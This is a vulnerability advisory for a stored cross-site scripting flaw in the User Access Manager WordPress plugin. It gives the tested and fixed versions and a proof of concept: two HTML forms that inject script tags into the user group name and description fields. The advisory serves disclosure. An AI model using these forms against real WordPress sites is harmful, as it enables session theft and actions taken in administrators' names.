Abstract
A persistent Cross-Site Scripting vulnerability has been encountered in the User Access Manager WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.
OVE ID
OVE-20160712-0025
Tested versions
This issue was successfully tested on the User Access Manager WordPress Plugin version 1.2.6.7.
Fix
This issue is resolved in User Access Manager version 1.2.14.
Introduction
With the User Access Manager WordPress plugin it is possible to manage access to posts, pages and files. This plugin is useful if you need a member area or a private section at your blog or you want that other people can write at your blog but not everywhere.
Details
Persistent Cross-Site Scripting was found in admin panel manage
page of User Access Manager. Multiple parameters in POST uam_usergroup
are affected due to insufficient output encoding. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
<input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
<input type="hidden" name="action" value="addGroup" />
<input type="hidden" name="**userGroupName**" value="**as<script>alert(1)</script>**" />
<input type="hidden" name="userGroupDescription" value="asd" />
<input type="hidden" name="ipRange" value="asd" />
<input type="hidden" name="readAccess" value="group" />
<input type="hidden" name="writeAccess" value="group" />
<input type="hidden" name="submit" value="Add user group" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
<input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
<input type="hidden" name="action" value="addGroup" />
<input type="hidden" name="userGroupName" value="sad" />
<input type="hidden" name="**userGroupDescription**" value="**<script>alert(2)</script>**" />
<input type="hidden" name="ipRange" value="asd" />
<input type="hidden" name="readAccess" value="group" />
<input type="hidden" name="writeAccess" value="group" />
<input type="hidden" name="submit" value="Add user group" />
<input type="submit" value="Submit" />
</form>
</body>
</html>